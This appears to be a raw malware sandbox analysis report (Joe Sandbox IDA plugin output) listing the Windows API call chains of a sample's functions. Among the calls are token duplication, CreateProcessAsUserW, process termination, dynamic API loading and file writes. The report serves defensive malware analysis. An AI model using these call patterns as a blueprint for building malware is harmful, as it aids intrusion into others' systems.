Part of subcall function 0040A98B: GetForegroundWindow.USER32 ref: 0040AFF4
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B052
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B055
Part of subcall function 0040A98B: GetProcessWindowStation.USER32 ref: 0040B072
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000008), ref: 0040B0BD
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B0C0
Part of subcall function 0040A98B: GetModuleHandleW.KERNEL32(00000000), ref: 0040B0DC
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040B125
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B128
Part of subcall function 0040A98B: GetCapture.USER32 ref: 0040B13F
Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B1CD
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B213
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B216
Part of subcall function 0040A98B: IsSystemResumeAutomatic.KERNEL32 ref: 0040B22D
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0040B29D
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B2A0
Part of subcall function 0040A98B: GetCurrentThreadId.KERNEL32 ref: 0040B2B7
Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B2E2
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,0000002B), ref: 0040B363
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B366
Part of subcall function 0040A98B: GetClipboardSequenceNumber.USER32 ref: 0040B380
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B40D
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B410
Part of subcall function 0040A98B: ReleaseCapture.USER32 ref: 0040B427
Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B452
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B4B4
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B4B7
Part of subcall function 0040A98B: GetProcessWindowStation.USER32 ref: 0040B4CE
Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B4F9
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B552
Part of subcall function 0040A98B: HeapAlloc.KERNEL32(00000000), ref: 0040B555
Part of subcall function 0040A98B: GetMenuCheckMarkDimensions.USER32 ref: 0040B569
Part of subcall function 0040A98B: StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B594
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040B5AF
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5B8
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,00000005), ref: 0040B5BD
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5C0
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,706B7358), ref: 0040B5C7
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5CA
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5D4
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5D7
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,39635538), ref: 0040B5DE
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5E1
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,7D0C1C30), ref: 0040B5E8
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5EB
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,48496F7A), ref: 0040B5F2
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B5F5
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5FF
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B602
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B60C
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B60F
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B619
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B61C
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B626
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B629
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B633
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B636
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B640
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B643
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B64D
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B650
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B657
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B65A
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B664
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B667
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,371D0123), ref: 0040B66E
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B671
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,4F1D1F21), ref: 0040B678
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B67B
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,63784E47), ref: 0040B682
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B685
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B68F
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B692
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,77584575), ref: 0040B699
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B69C
Part of subcall function 0040A98B: GetProcessHeap.KERNEL32(00000000,?), ref: 0040B6A6
Part of subcall function 0040A98B: HeapFree.KERNEL32(00000000), ref: 0040B6A9

Strings

KCBqiNhR7x, xrefs: 004019C7

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00406E18, Relevance: 15.1, APIs: 10, Instructions: 81

APIs

Part of subcall function 00406C0B: wsprintfW.USER32 ref: 00406C4D
Part of subcall function 00406C0B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00406C6B
Part of subcall function 00406C0B: CloseHandle.KERNEL32(00000000), ref: 00406C7A

ExitThread.KERNEL32 ref: 00406F17

Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00406E91
GetExitCodeProcess.KERNEL32(?), ref: 00406EA6
Sleep.KERNEL32(00001388), ref: 00406EB1
TerminateProcess.KERNEL32(00000000), ref: 00406EBE
CreateThread.KERNEL32(00000000,00000000,00406E18,?,00000000,00000000), ref: 00406ECE
CloseHandle.KERNEL32(00000000), ref: 00406EDB
CloseHandle.KERNEL32 ref: 00406EE3
FindAtomW.KERNEL32(?), ref: 00406F06
DeleteAtom.KERNEL32(?), ref: 00406F10

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004086AF, Relevance: 15.1, APIs: 10, Instructions: 70

APIs

GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,004077F1,00000000,?), ref: 004086D1
HeapAlloc.KERNEL32(00000000), ref: 004086D8
GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 004086EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040870B
HeapFree.KERNEL32(00000000), ref: 0040870E
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040871A
HeapAlloc.KERNEL32(00000000), ref: 0040871D
GetLastError.KERNEL32 ref: 0040873B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408746
HeapFree.KERNEL32(00000000), ref: 0040874D

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0042BDAC, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 290

APIs

Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,00000000,?,00423E3E,00000018,00435890,0000000C,00423ECE,00000000,00000000,?,00421317,0000000D), ref: 00424C61

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

GetCPInfo.KERNEL32(?,?), ref: 0042BE95
___crtGetStringTypeA.LIBCMT ref: 0042BF03
___crtLCMapStringA.LIBCMT ref: 0042BF36
___crtLCMapStringA.LIBCMT ref: 0042BF63
InterlockedDecrement.KERNEL32(?), ref: 0042C042

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3

Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424522
Part of subcall function 004244D8: GetLastError.KERNEL32 ref: 00424530
Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424549
Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424584
Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042460D
Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000000), ref: 0042462D
Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669

InterlockedDecrement.KERNEL32(?), ref: 0042C108

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

xLC, xrefs: 0042C12E
pFC, xrefs: 0042C11A

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042BDAC, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 290

APIs

Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

GetCPInfo.KERNEL32(?,?), ref: 0042BE95
___crtGetStringTypeA.LIBCMT ref: 0042BF03
___crtLCMapStringA.LIBCMT ref: 0042BF36
___crtLCMapStringA.LIBCMT ref: 0042BF63
InterlockedDecrement.KERNEL32(?), ref: 0042C042

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424522
Part of subcall function 004244D8: GetLastError.KERNEL32 ref: 00424530
Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424549
Part of subcall function 004244D8: ___crtGetLocaleInfoA.LIBCMT ref: 00424584
Part of subcall function 004244D8: GetLocaleInfoW.KERNEL32(?,?,00000000,00000002), ref: 00424669

InterlockedDecrement.KERNEL32(?), ref: 0042C108

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

xLC, xrefs: 0042C12E
pFC, xrefs: 0042C11A

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0040A626, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107

APIs

GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0040A6B0
HeapAlloc.KERNEL32(00000000), ref: 0040A6B3
GetCurrentThreadId.KERNEL32 ref: 0040A6C5

Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0040A50C
Part of subcall function 0040A4DC: HeapAlloc.KERNEL32(00000000), ref: 0040A50F
Part of subcall function 0040A4DC: GetMessagePos.USER32 ref: 0040A52A
Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040A593
Part of subcall function 0040A4DC: HeapAlloc.KERNEL32(00000000), ref: 0040A596
Part of subcall function 0040A4DC: GetCurrentThreadId.KERNEL32 ref: 0040A5AA
Part of subcall function 0040A4DC: LoadLibraryA.KERNEL32(?), ref: 0040A5D4
Part of subcall function 0040A4DC: GetProcAddress.KERNEL32(00000000), ref: 0040A5DB
Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A5EF
Part of subcall function 0040A4DC: HeapFree.KERNEL32(00000000), ref: 0040A5F2
Part of subcall function 0040A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A614
Part of subcall function 0040A4DC: HeapFree.KERNEL32(00000000), ref: 0040A617

GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0040A717
HeapAlloc.KERNEL32(00000000), ref: 0040A71A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A766
HeapFree.KERNEL32(00000000), ref: 0040A76D

Strings

Hrvx, xrefs: 0040A6A3

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00406C88, Relevance: 13.6, APIs: 9, Instructions: 123

APIs

Part of subcall function 004067FB: GetProcessHeap.KERNEL32(00000008,00000089), ref: 004068BE
Part of subcall function 004067FB: HeapAlloc.KERNEL32(00000000), ref: 004068C5
Part of subcall function 004067FB: CountClipboardFormats.USER32 ref: 004068D6
Part of subcall function 004067FB: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040690F
Part of subcall function 004067FB: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00406934
Part of subcall function 004067FB: CloseHandle.KERNEL32(00000000), ref: 00406943
Part of subcall function 004067FB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040694E
Part of subcall function 004067FB: HeapFree.KERNEL32(00000000), ref: 00406955

ExitThread.KERNEL32 ref: 00406E11

Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6

Part of subcall function 004064D2: OpenProcess.KERNEL32(02000000,00000000), ref: 00406529
Part of subcall function 004064D2: ProcessIdToSessionId.KERNEL32(?,?), ref: 00406541
Part of subcall function 004064D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0040655F
Part of subcall function 004064D2: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00406586
Part of subcall function 004064D2: SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 004065A6
Part of subcall function 004064D2: AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004065C0
Part of subcall function 004064D2: GetLengthSid.ADVAPI32(?,?,?), ref: 004065D8
Part of subcall function 004064D2: SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00406604
Part of subcall function 004064D2: CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0040660F
Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00406679
Part of subcall function 004064D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00406680
Part of subcall function 004064D2: GetCaretBlinkTime.USER32 ref: 0040669C
Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 004066FF
Part of subcall function 004064D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00406706
Part of subcall function 004064D2: CreatePopupMenu.USER32 ref: 0040671A
Part of subcall function 004064D2: CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00406777
Part of subcall function 004064D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00406793
Part of subcall function 004064D2: CloseHandle.KERNEL32(?), ref: 004067A8
Part of subcall function 004064D2: CloseHandle.KERNEL32(00007479), ref: 004067B0
Part of subcall function 004064D2: DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 004067BB
Part of subcall function 004064D2: CloseHandle.KERNEL32(?), ref: 004067C4
Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 004067C9
Part of subcall function 004064D2: HeapFree.KERNEL32(00000000,?,?), ref: 004067D6
Part of subcall function 004064D2: GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004067DB
Part of subcall function 004064D2: HeapFree.KERNEL32(00000000,?,?), ref: 004067E2
Part of subcall function 004064D2: CloseHandle.KERNEL32(?), ref: 004067ED
Part of subcall function 004064D2: CloseHandle.KERNEL32(00000000), ref: 004067F0

Part of subcall function 0040D9F1: CreateFileW.KERNEL32(001CFDA8,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040DA1F
Part of subcall function 0040D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA2E
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA47
Part of subcall function 0040D9F1: HeapAlloc.KERNEL32(00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA4E
Part of subcall function 0040D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040DA63
Part of subcall function 0040D9F1: GetLastError.KERNEL32(?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DA8B
Part of subcall function 0040D9F1: CloseHandle.KERNEL32(00000000), ref: 0040DA99
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAB0
Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DAB7
Part of subcall function 0040D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040DAC3
Part of subcall function 0040D9F1: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040DACA

CloseHandle.KERNEL32 ref: 00406DDB

Part of subcall function 0040D768: GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0040D7EF
Part of subcall function 0040D768: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0040D7F2
Part of subcall function 0040D768: GetShellWindow.USER32 ref: 0040D803
Part of subcall function 0040D768: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0040D83D
Part of subcall function 0040D768: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0040D86B
Part of subcall function 0040D768: CloseHandle.KERNEL32 ref: 0040D880
Part of subcall function 0040D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D88E
Part of subcall function 0040D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D891
Part of subcall function 0040D768: StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0040D89F
Part of subcall function 0040D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D8A7
Part of subcall function 0040D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D8AA

Part of subcall function 00409240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00409263
Part of subcall function 00409240: CloseHandle.KERNEL32(00000000), ref: 004093F9

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00406D9C
Sleep.KERNEL32(00001388), ref: 00406DA7
TerminateProcess.KERNEL32(00000000), ref: 00406DB4
CreateThread.KERNEL32(00000000,00000000,00406C88,?,00000000,00000000), ref: 00406DC6
CloseHandle.KERNEL32(00000000), ref: 00406DD3
FindAtomW.KERNEL32(?), ref: 00406E00
DeleteAtom.KERNEL32(?), ref: 00406E0A

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040DD0B, Relevance: 13.6, APIs: 9, Instructions: 72

APIs

Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,00000000,001CFDA8,001CFDA8,001CFDA8,001CFDA8,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D991
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0040D9AB
Part of subcall function 0040D97F: HeapAlloc.KERNEL32(00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9B2
Part of subcall function 0040D97F: ExpandEnvironmentStringsW.KERNEL32(001CFDA8,00000000,7142434B,00000000,?,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?), ref: 0040D9CD
Part of subcall function 0040D97F: GetProcessHeap.KERNEL32(00000000,00000000,0040DA06,00412000,7142434B,001CFDA8,?,00401ADF,?,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040D9DA
Part of subcall function 0040D97F: HeapFree.KERNEL32(00000000,?,00401ADF), ref: 0040D9E1

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44

Part of subcall function 0040DAD5: GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0040DAF2
Part of subcall function 0040DAD5: SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0040DBA6
Part of subcall function 0040DAD5: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040DBAD
Part of subcall function 0040DAD5: SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0040DBB6

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
